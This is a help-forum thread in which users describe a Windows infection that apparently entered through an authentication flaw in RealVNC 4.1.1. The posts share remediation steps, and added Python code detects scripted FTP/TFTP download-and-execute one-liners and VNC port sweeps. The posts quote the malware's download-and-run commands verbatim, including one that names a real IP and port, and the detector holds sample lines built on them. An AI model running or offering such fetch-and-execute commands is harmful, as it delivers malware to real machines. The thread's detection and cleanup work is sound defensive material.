DOS (tftp) virus

Hello,

we have the same malware here it seems.
It is seen the same way by PrevX1, and it regularly activates some cmd script TFTPxx.
It also creates louvz.exe and others in c:\windows\system32 and launches them, and a lot of bad things!
example in a cmd : cmd /c echo OPEN 82.239.65.45 27222>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

It is MSQRSM, not detected by Avast, nor by other anti-virus (NAV, Grisoft) or anti-spyware (Ad-Aware),
but detected by PREVX1.

I'd like to send you the .exe file (237kb) for analysis and integration into the Avast database, but it is in c:\system volume information-RESTORE{F75EEC69-6E97-419B-93B4-6A3A275301C4}\RP296\AA0044493.exe
and not accessible.
I deactivated Windows System Restore on all hard drives and rebooted, but still no access to this directory, neither directly nor for anti-virus software!
I am working remotely on my father's PC, and can't boot from a DOS disk!

Any idea, please, how to copy this file and send it to you?
It came by clicking a URL in an HTML spam email… but I erased the email (just too soon…)

OS = Windows XP SP2 Home, up to date with updates
Avast version 4.7.871 august 2006 - skin 4.2.7.3
Athlon 64 3200+ 512 MB ram
Mail client: Thunderbird
NAV + Avast

The software launches CMD windows with TFTP xx download scripts; it prevents Mozilla and Thunderbird from connecting to the web and to SMTP/POP accounts; it creates various exe files in windows/system32, which are executed (seen in the task manager), etc. QUITE HARMFUL…

Thanks
FX
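The one-liner FX quotes above is a classic "living off the land" download-and-execute: a script file is written with echo, handed to the built-in FTP client with -n (no auto-login) and -s (run commands from a file), the fetched binary is run, and the script is deleted. The same shape appears later in the thread with tftp -i host GET file. The following detector is an added example, not code from the original posts or from any product mentioned in them; it inspects command lines (as a process-creation log or EDR feed would deliver them) and flags transfers that are immediately executed. The sample command lines are constructed for the example; the IP 192.0.2.10 is a documentation address standing in for the real one in the post.

```python
import re

# Tokens in cmd.exe one-liners end at whitespace, redirection or command separators.
TOKEN = r"[^\s>&|]+"

# "echo OPEN <host> [port] > <script>" - the start of a scripted ftp session
FTP_OPEN_RE = re.compile(
    rf"echo\s+OPEN\s+(?P<host>{TOKEN})(?:\s+(?P<port>\d+))?\s*>+\s*(?P<script>{TOKEN})", re.I)
# "echo GET <file> >> <script>" - the download line appended to that script
FTP_GET_RE = re.compile(rf"echo\s+GET\s+(?P<file>{TOKEN})\s*>+\s*(?P<script>{TOKEN})", re.I)
# "ftp -n -s:<script>" - the client run non-interactively against the script just written
FTP_RUN_RE = re.compile(rf"\bftp(?:\.exe)?\s+[^&|]*-s:(?P<script>{TOKEN})", re.I)
# "tftp [-i] <host> GET <file>" - the one-line tftp variant seen in the thread
TFTP_RE = re.compile(rf"\btftp(?:\.exe)?\s+(?:-i\s+)?(?P<host>{TOKEN})\s+GET\s+(?P<file>{TOKEN})", re.I)


def find_downloads(cmdline):
    """Return a list of (tool, host, file) for transfers scripted in one command line."""
    downloads = []
    for m in TFTP_RE.finditer(cmdline):
        downloads.append(("tftp", m["host"], m["file"]))
    open_m = FTP_OPEN_RE.search(cmdline)
    run_m = FTP_RUN_RE.search(cmdline)
    # The OPEN line and the ftp -s: invocation must refer to the same script file.
    if open_m and run_m and open_m["script"].lower() == run_m["script"].lower():
        for g in FTP_GET_RE.finditer(cmdline):
            if g["script"].lower() == open_m["script"].lower():
                downloads.append(("ftp", open_m["host"], g["file"]))
    return downloads


def executed_after_download(cmdline, downloads):
    """Downloaded files that are run as a later command in the same line."""
    segments = [s.strip() for s in re.split(r"&+|\|+", cmdline) if s.strip()]
    first_words = [s.split()[0].lower() for s in segments]
    names = {f.lower() for _, _, f in downloads}
    names |= {n[:-4] for n in names if n.endswith(".exe")}  # "tool" as well as "tool.exe"
    hits = []
    for w in first_words:
        if w in names and w not in hits:
            hits.append(w)
    return hits


def classify(cmdline):
    """Verdict plus the evidence behind it, so an analyst can see why it fired."""
    downloads = find_downloads(cmdline)
    executed = executed_after_download(cmdline, downloads)
    if downloads and executed:
        verdict = "download-and-execute"
    elif downloads:
        verdict = "scripted-download"
    else:
        verdict = "clean"
    return {"verdict": verdict, "downloads": downloads, "executed": executed}


# Constructed sample command lines (modelled on the thread, not captured from it).
SAMPLE_COMMAND_LINES = [
    r"cmd /c echo OPEN 192.0.2.10 27222>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x"
    r"&FTP -n -s:x&84785_redworld2.exe&del x&exit",
    r"cmd /c tftp -i 0.0.0.0 GET msqrsm.exe & msqrsm.exe",
    r"cmd /c echo OPEN 192.0.2.10>x&echo GET tool.exe>>x&echo QUIT>>x&ftp -n -s:x&del x",
    r"C:\WINDOWS\system32\notepad.exe C:\Docs\notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(classify(line)["verdict"], "<-", line[:60])
```

The point of splitting the evidence out is triage: a scripted download on its own may be an admin job, but a download whose target is launched in the same command line, with the script file deleted afterwards, is the pattern the posts describe and is worth an alert on its own.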

Hello FX,

You mention that you are working remotely on your dad’s machine? Are you using RealVNC 4.1.1? If so - it has a security hole that can be breached in the auth module. Check out this site for more info:

http://fileinfo.prevx.com/adware/qqccf340481465-msin23040165/msinexecs.exe.html

Rgds. Otto.

Hi aplcom,

Thank you for the Ethereal information. I understand; you are right that action is unlikely from the ISP. Since this is now running in Europe too I assume Scotland Yard already knows about it.

From what we experience, at least on some occasions [yes, still running, but that was an oversight on our behalf], it seems to be a download to another IP address than the host machine. The trouble you saw was the attempt to download to your IP address?

I just saw your question to FXsan78 come in; I was going to inquire about the version too. I guess he is in trouble as the dirty software is already running.

@FXsan78
What keyboard layout is installed on your attacked machine? I noticed the French at the bottom and I am very interested in the type of keyboard you use on the target machine.

C.

Hi aplcom,

I forgot to add that for many weeks our computer has been running in 'stealth' mode according to grc.com. That was why I could not figure out how something had gotten through apparently without any action on the part of the operator. It is however likely to be wishful thinking that my daughter did not get it by email.

With VNC running all the time, well, bad luck for us.

C.

Hi FX,

When you turned off System Restore you effectively deleted the file from that location. If it's still on your hard drive somewhere else you can email a zipped and password-protected sample to virus@avast.com. Make sure to explain that it is an undetected virus and provide the password in the body of your email.

If you’re using RealVNC make sure you follow aplcom’s link to patch this security hole.

@aplcom and cylosine,

If FX’s infection is the same as yours then you may find the problem recurs even after applying the RealVNC patch. If it does then do as FX did: turn off System Restore, reboot, and scan again.

We have installed RealVNC 4.1.2 and are trying to log the attacks. They seem to still occur, but now Sygate Personal Firewall is warning of attempts to connect to a VNC session. We have decided to keep the VNC server running for a while.

From the data we believe that the attack is coming from a computer in the same big network that our computer is connected to. I am guessing this is a random number and that it is automated. Hope to catch a few more before the attacks stop. The originator can't be that silly to keep it up for a long time, allowing tracing.

I noticed that the free version of VNC is a bit limited in its use of encryption; for this reason I am reconsidering its use over the internet. It is a bit of a jungle to get through safely.

C.

Hi,

I've not had any recurrence at all. Once I realized what the problem was, I booted from a clean "Win Live CD" and cleaned the hdd (deleted all tmp areas, deleted recycled etc etc etc), ran several different antivirus scanners and also manually cleaned the registry. I also put cmd.exe, tftp.exe, ftp.exe and several other programs into a secure area only accessible by me (also renamed those programs) just to be safe. I also re-installed the firewall from scratch and set new rules (using ZoneAlarm: ONLY vnc has server rights, all else locked out).

I agree, the attack seems to occur on the same ISP network (mine is 221.124.x.y), which leads me to believe that someone's computer on the network is compromised and the hacker is using that system to hack others on the same network. As the attack is identical every time, I also can't believe the hacker to be so stupid (hence it may be a bot??)

You can also consider UltraVNC or TightVNC: both are free, both offer super encryption, both don't have the auth security hole. However, RealVNC 4.1.2 seems to have solved most of my problems.

Keeping my fingers crossed, but all's well so far!!

Rgds.

Hello,

@ aplcom/Otto, yes I was using RealVNC 4.1.1.
I upgraded to 4.2 (30days version) after reading the post here.
Now I have found a version 4.1.2 again which is full without the 30-day licence. I will install it back after solving everything.

@cylosine, yes AZERTY french keyboard

@mauserme, as I said I deleted the email I suspected of having the link that imported the virus, and sorry I could not send it to you.

Tonight NAV reports a Magister virus. I will try the removal tool, but will need some local aid for booting in safe mode :wink:

Thanks to all
fX

Hi FXsan78,

VNC 4.2 is the "VNC Personal" version which costs money. I also got a bit confused and downloaded this but went searching a bit more for the so-called "VNC Free" until I found it.

I am making a strong guess that the machine that attacked you also had a French AZERTY keyboard; this however is unlikely to be of any help.

Depending on how familiar you are with computers, I can recommend always having a Bart PE boot disk; this is a short version of Windows which will boot and run Windows off a CD, and you can access your hard disk from this environment.

This is similar to what aplcom is saying about using a “Win Live CD”.

C.

Hi all, this is my first post,

My company has 4 servers running: 3 are Windows 2000 and 1 is Windows 2003. 4 days ago, when I was using VNC to remote to my company servers from my home, I saw all servers automatically open a cmd command via Run, and in the command window it automatically typed tftp -i 0.0.0.0 GET msqrsm.exe and then msqrsm.exe. I checked the firewall log; it always had my server SRC address 192.168.0.3 to DEST address 192.168.x.x (x.x meaning random), SRC port 22xx (xx meaning random), DEST port 5900, and in 1 min it can send many packets to random private IPs…

Can any brother tell me what type of virus infected them? And how to fix this problem?
Or do I just need to upgrade the VNC version to 4.1.2 to solve all problems?

Home VNC version 4.1.2, company server VNC version 4.1.1

Thanks !!!
Wilson
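Wilson's firewall log is a textbook internal sweep: one source, many random 192.168.x.x destinations, always port 5900, within a minute. The following is an added example, not code from the thread or from Shorewall, showing how to turn that observation into a detection over netfilter-style log lines. The log format (a syslog timestamp followed by SRC=, DST=, PROTO=, SPT= and DPT= fields, as Shorewall logging through the kernel produces) is assumed, and the sample lines are constructed to mirror the post, not captured from Wilson's servers. The rule counts distinct destinations per source on the VNC port inside a sliding window and generalises to any port and threshold.

```python
import re
from collections import defaultdict
from datetime import datetime

# Assumed netfilter/Shorewall log layout: syslog timestamp ... SRC= DST= ... PROTO= SPT= DPT=
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=(?P<proto>\w+) SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)")


def parse_line(line):
    """Return the fields a sweep detector needs, or None for lines that do not match."""
    m = LOG_RE.search(line)
    if not m:
        return None
    return {
        # Syslog timestamps carry no year; deltas within one day are all we need here.
        "ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"),
        "src": m["src"], "dst": m["dst"],
        "spt": int(m["spt"]), "dpt": int(m["dpt"]),
    }


def find_sweeps(lines, port=5900, window_seconds=60, min_targets=5):
    """Sources that hit at least `min_targets` distinct hosts on `port` within `window_seconds`.

    Returns {source_ip: max distinct destinations seen in any one window}.
    """
    by_src = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["dpt"] == port:
            by_src[ev["src"]].append(ev)
    alerts = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        best, start = 0, 0
        for end in range(len(events)):
            # Slide the window start forward until it fits inside window_seconds.
            while (events[end]["ts"] - events[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            distinct = len({e["dst"] for e in events[start:end + 1]})
            best = max(best, distinct)
        if best >= min_targets:
            alerts[src] = best
    return alerts


# Constructed sample log (not from the original post): a sweep from 192.168.0.3, plus one
# legitimate inbound VNC session and one unrelated HTTP connection as noise.
SAMPLE_LOG = [
    "Sep 20 10:01:02 fw kernel: Shorewall:loc2all:DROP:IN=eth1 OUT=eth1 SRC=192.168.0.3 DST=192.168.7.41 LEN=48 TTL=128 PROTO=TCP SPT=2231 DPT=5900 SYN",
    "Sep 20 10:01:03 fw kernel: Shorewall:loc2all:DROP:IN=eth1 OUT=eth1 SRC=192.168.0.3 DST=192.168.19.8 LEN=48 TTL=128 PROTO=TCP SPT=2232 DPT=5900 SYN",
    "Sep 20 10:01:05 fw kernel: Shorewall:loc2all:DROP:IN=eth1 OUT=eth1 SRC=192.168.0.3 DST=192.168.201.77 LEN=48 TTL=128 PROTO=TCP SPT=2233 DPT=5900 SYN",
    "Sep 20 10:01:09 fw kernel: Shorewall:loc2all:DROP:IN=eth1 OUT=eth1 SRC=192.168.0.3 DST=192.168.44.2 LEN=48 TTL=128 PROTO=TCP SPT=2234 DPT=5900 SYN",
    "Sep 20 10:01:12 fw kernel: Shorewall:loc2all:DROP:IN=eth1 OUT=eth1 SRC=192.168.0.3 DST=192.168.3.130 LEN=48 TTL=128 PROTO=TCP SPT=2235 DPT=5900 SYN",
    "Sep 20 10:01:15 fw kernel: Shorewall:loc2all:DROP:IN=eth1 OUT=eth1 SRC=192.168.0.3 DST=192.168.99.9 LEN=48 TTL=128 PROTO=TCP SPT=2236 DPT=5900 SYN",
    "Sep 20 10:01:20 fw kernel: Shorewall:loc2all:DROP:IN=eth1 OUT=eth1 SRC=192.168.0.3 DST=192.168.150.61 LEN=48 TTL=128 PROTO=TCP SPT=2237 DPT=5900 SYN",
    "Sep 20 10:01:26 fw kernel: Shorewall:loc2all:DROP:IN=eth1 OUT=eth1 SRC=192.168.0.3 DST=192.168.12.250 LEN=48 TTL=128 PROTO=TCP SPT=2238 DPT=5900 SYN",
    "Sep 20 10:02:30 fw kernel: Shorewall:net2loc:ACCEPT:IN=eth0 OUT=eth1 SRC=192.168.0.50 DST=192.168.0.3 LEN=48 TTL=64 PROTO=TCP SPT=40123 DPT=5900 SYN",
    "Sep 20 10:03:00 fw kernel: Shorewall:loc2net:ACCEPT:IN=eth1 OUT=eth0 SRC=192.168.0.3 DST=192.0.2.80 LEN=48 TTL=128 PROTO=TCP SPT=2239 DPT=80 SYN",
]

if __name__ == "__main__":
    for src, n in find_sweeps(SAMPLE_LOG).items():
        print(f"possible VNC sweep from {src}: {n} distinct targets inside one window")
```

The legitimate session from 192.168.0.50 and the web connection on port 80 do not fire, because the rule keys on one source reaching many distinct hosts on the same service port; a single admin connecting to one server looks nothing like that.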

Hi leiw,
May you find inspiration and help in the forum.

1… Version 4.1.1 you cannot get rid of fast enough, especially now that you have seen that somebody knows, perhaps accidentally, that your servers exist.

Upgrading to 4.1.2 gets you over the initial flaw, but if you are using the free version I would suggest you review this for use over the internet. Reading the small print/manual or specs more closely, this is not recommended when you cross the internet jungle, as the password encryption is not strong. The normal session information, I understand, is just open to anybody with no encryption.

I forgot this and happily used it for 12 months until it went bad. If your company information is important you should consider the 'bigger' versions which have much better encryption and encryption on the session transmissions. Convince yourself you understand all this, because I am not an expert; I just have some reasonable understanding about various aspects of computing.

Consider moving away from using the default port of 5900; perhaps that may give you some protection. "Everybody" knows that port and will almost by default have this in their software. It just makes it a little bit harder for unwanted sniffing.

I am deliberately using the underscore in the next lines.

tftp -i 0.0.0.0 GET msqrsm_exe

msqrsm_exe

My understanding is the first line downloads the dirty file to IP address 0.0.0.0, where I am not sure of the importance of 0.0.0.0; I had expected your public IP address here, which could be a very good thing.

The second line executes the msqrsm_exe. If it had been downloaded to your machines or network, you must go looking for how to get rid of what it has downloaded.

The only place I have seen help is PREVX1; I am still trying to find out more. Actually I have put our machine on sort of hold as I have run out of energy to focus on just this bastard.

Like you I still have no idea how our machine got activated. Because we used VNC 4.1.1 I am assuming that somehow an accidental port scan revealed our existence on the net despite running in stealth mode behind a software firewall. Unfortunately the NAT router was not installed on the cable modem. We did not have that extra protection, which you seem to have as you are on a 192.168.1.x network.

Do you have a software firewall as well as NAT? I may be a little bit out in deep water as you talked about servers and I talk about hosts. You may be better protected.

Have you facility to log all incoming and outgoing traffic? If so this should reveal a lot about what msqrsm_exe.

Where it came from? No idea

Good luck and I hope it did not run.

C.

To Cylosine:

Thanks for your reply. I will go back to the company to upgrade VNC to the 4.1.2 version. One question: after upgrading VNC, will the auto command disappear? Or do I need to use PREVX1 to clear all the dirty files? But I think maybe it cannot clear all the dirty files, because I tried it.

I am using Shorewall, which is a free Linux firewall including NAT, packet filtering etc. For now I have dropped all outgoing traffic to prevent it. I will post the firewall log when I go back to the company.

Hi leiw

1… The command windows may disappear, if they are coming from the outside.
2… If you have any trace of malware still around, try PREVX1, I have still not found any other mention on the net. But I am not looking at the moment.
C.

I believe 0.0.0.0 designates “default route” in this case. This way an outbound connection can be established without knowing the address for the gateway and may hide the underlying process to some degree.

Certainly port 5900 is open during an active session, but keep in mind that the GRC site doesn't scan that high (it only goes as high as port 1055 for the Scan All Service Ports test and includes port 5000 (but nothing higher) for the Common Ports test). If you want to test this further you could try the scanning tools at PC Flank, which has an option to specify a port under the Advanced Port Scanner tab:

http://www.pcflank.com/scanner1s.htm

or a program like Nmap (use cautiously lest you get booted by your ISP).

From this point of view it could be a random scan but maybe more likely an attacker targeting the vulnerability.

I'm guessing #1 will be the case if your server is being cracked during an active session, but you might still need to remove malware (so far I haven't seen any indication that it's originating on the client).

#2 is a definite if the problem originates on the server in the form of something like a trojan downloader.

The answer to which of these is the case may lie in when the problems occur: only during an active session, or randomly when the server is idling. Does anyone have information on this?

Hi mauserme,

About 0.0.0.0 I was hoping this was not the case, wonder what happened.

GRC test: thanks for pointing out that the scan is limited to the 'service' group. I forgot that higher up one must be more specific; the largest range scan is 64 ports at a time. A scan of 5900-5963 only revealed that 5900 is known as the VNC entry.

General: I have just done a search on the internet for the following files, and listed which virus labs seem to have some info:

msinexecs.exe prevx
msqrsm.exe prevx
winlolx.exe prevx, Sophos?
louvz.exe nothing mentioned

Has anybody else seen better information on these?